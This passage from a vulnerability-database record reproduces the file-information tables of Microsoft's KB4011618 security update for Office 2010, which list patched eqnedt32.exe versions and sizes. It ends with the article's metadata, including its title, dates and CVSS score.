width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_2052</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_2070</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_2074</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_3082</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr></tbody></table><h3>\u00a0</h3><h3>For all supported x64-based versions of Office 2010</h3><table class=\"table\"><tbody><tr height=\"21\"><td height=\"21\" width=\"131\"><strong>Fileidentifier</strong></td><td width=\"104\"><strong>File name</strong></td><td width=\"88\"><strong>File version</strong></td><td width=\"93\"><strong>File size</strong></td><td width=\"72\"><strong>Date</strong></td><td width=\"73\"><strong>Time</strong></td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1025</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1026</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1028</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1029</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1030</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1031</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1032</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1033</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1035</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1036</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1037</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1038</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1040</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1041</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1042</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1043</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1044</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1045</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1046</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1048</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1049</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1050</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1051</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1053</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1054</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1055</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1058</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1060</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1061</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1062</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1063</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1081</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_1087</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_2052</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_2070</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_2074</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr><tr height=\"21\"><td height=\"21\" width=\"131\">eqnedt32.exe_3082</td><td width=\"104\">eqnedt32.exe</td><td align=\"right\" width=\"88\">17081400</td><td align=\"right\" width=\"93\">552,680</td><td align=\"right\" width=\"72\">2-Nov-17</td><td align=\"right\" width=\"73\">7:54</td></tr></tbody></table></body></html>", "edition": 4, "modified": "2020-04-16T08:38:26", "id": "KB4011618", "href": "https://support.microsoft.com/en-us/help/4011618/", "published": "2017-11-28T00:00:00", "title": "Description of the security update for Office 2010: November 28, 2017", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}